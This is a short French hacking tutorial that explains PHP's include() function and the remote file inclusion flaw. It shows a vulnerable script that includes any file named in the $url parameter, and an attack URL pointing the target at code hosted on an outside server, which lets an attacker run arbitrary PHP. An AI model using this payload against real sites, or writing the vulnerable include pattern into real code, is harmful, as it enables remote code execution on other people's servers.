.: La faille include :.

1)La fonction include
***************

En php pour inclure un fichier dans un autre
on fait :

include("fichier.txt");
?>

ou :

$url = "fichier.txt"; // on se sert de la variable $url
include($url);
?>

on encore :

include("http://www.google.fr/index.html");
?>


Dans ce cas google sera rajouter a votre index .

deuxieme cas on peut aussi faire :

include("http://www.tonsite.com/fichier.txt");
?>

2)La faille Include
*******************

Si un webmaster fait sur son site un script index de se style :
if($url) { // si url est defini
include($url); // on inclue la valeur contenu
// dans $url
}
else {
include("accueil.php"); // si $url n'est pas defini on
// inclue accueil.php qui est
// la page par defaut
}
?>

Quand on accede a la page d'acceil on a :
http://www.cible.com/index.php
Puisque $url n'a pas de parametre il va inclure le fichier par defaut qui est
accueil.php si on lui donne :
http://www.cible.com/index.php?url=contact.php
il va inclure si elle existe la page contact.php

Voila on se rapproche du hack
imaginons que le hacker fasse:

--------------------------------------------------------------------
http://www.cible.com/index.php?url=http://www.url.com/fichier.txt |
--------------------------------------------------------------------

cette personne va pouvoir executer n'importe quelle commande
php grace a son fichier qui se trouve sur
http://www.url.com/fichier.txt

Voila maintenant vous pouvez glissez n'importe quel code arbitraire
dans la page sans probleme, je vous laisse imaginer le reste.

E-[S]kuZ